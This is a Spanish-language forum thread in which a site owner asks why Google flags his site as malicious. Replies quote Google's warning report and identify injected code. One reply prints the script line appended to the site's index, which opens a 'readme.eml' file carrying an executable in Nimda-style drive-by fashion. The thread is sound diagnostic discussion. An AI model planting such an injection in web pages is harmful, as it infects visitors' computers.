Foros Programación Cliente

¡Este sitio es una web atacante!

7 7 Respuestas Miércoles 14 de octubre, 2009
me sale eso al entrar a la pagina, desde hoy, he pasado varios antivirus incluido el kaspersky online y esta todo correcto,pero google me cierra la pagina y pone un mensaje de virus en la portada, que hago?... gracias

la web es: www . kalipo . com

Registrado desde 10/05/06
Número de posts: 514
  • Avatar de yosoyraro yosoyraro Registrado desde 27/12/08 / Número de posts: 103
    Esto es lo que dice Google... y creo que deberías hablar con los proveedores del hosting.

¿Cuál es el estado actual de kalipo.com?
    Este sitio aparece como sospechoso: la visita a este sitio web puede dañar su equipo.

Parte de este sitio ha sido marcado 1veces por actividad sospechosa durante los últimos 90 días.

¿Qué ocurrió cuando Google visitó este sitio?
    De las 9 páginas analizadas en el sitio durante los últimos 90 días, 5 página(s) contenía(n) software malicioso que había sido descargado e instalado sin el permiso del usuario. Google visitó este sitio por última vez el 2009-10-13, y se encontró contenido sospechoso en este sitio por última vez el 2009-10-13.
    El software malicioso se encuentra alojado en 1 dominio(s), entre los que se incluyen check-your-iq.ru/.

This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

¿Ha actuado el sitio como intermediario dando lugar a una mayor difusión de software malicioso?
    No parece que, durante los últimos 90 días, kalipo.com haya actuado como intermediario en la infección de sitios.

¿Ha alojado este sitio software malicioso?
    No, este sitio no ha alojado software malicioso durante los últimos 90 días.

¿Cómo ha ocurrido?
    En algunos casos, existen terceras partes que añaden códigos malignos a sitios legítimos, lo que nos puede llevar a mostrar un mensaje de advertencia.

lo raro sería no contar conmigo para tus proyectos....
    ¡Visita mi Nueva web!
    Publicado hace 2 años
  • Avatar de yosoyraro yosoyraro Registrado desde 27/12/08 / Número de posts: 103
    Por cierto, el antivirus me acaba de neutralizar un virus llamado W32-Nimda procedente de esa Web así que aconsejo que nadie entre a ver que error sale....
    :)
    lo raro sería no contar conmigo para tus proyectos....
    ¡Visita mi Nueva web!
    Publicado hace 2 años
  • Avatar de dem dem Registrado desde 28/04/03 / Número de posts: 2088
    Esto me parece que ya le pasó a alguien... La historia era que se había metido un virus en el servidor donde tenía la web, con lo que esa web pasa a ser web atacante... Usando el buscador no encuentro nada, pero me suena que ya había un tema de ésto, prueba a ver...
    A mi me ocurrió esto un par de veces, pégale un ojo al index y los javascripts que tengas subido en el servidor, es posible que te haya inyectado algún iframe en el código.
    Publicado hace 2 años
  • Avatar de dagi3d dagi3d Registrado desde 13/12/03 / Número de posts: 1054
    parece que el jaleo está al final del index:

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
    <html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>

y el readme.eml es un mensaje de correo con un ejecutable adjunto que se intenta descargar a través de un iframe
    Publicado hace 2 años
  • Avatar de portishead portishead Registrado desde 15/07/04 / Número de posts: 270
    A mi me pasó tb con una web, todavia no se porqué, pero me incrustaron "código malicioso" en el index. Lo borré , cambié todas las passwords y no me ha vuelto a pasar...de momento.
    Publicado hace 2 años
  • Avatar de AxB AxB Registrado desde 10/05/06 / Número de posts: 514
    ahi está metieron un codigo para potenciar el posicionamiento de otra web y google lo detecto como intrusion y nos prohibe el acceso temporal a la web, aquí publicaron el ataque para los que os haya afectado en Dreamhost, ya estoy migrando la pagina a otro server más seguro

ATAQUE MALWARE A DREAMHOST

gracias.
    Publicado hace 2 años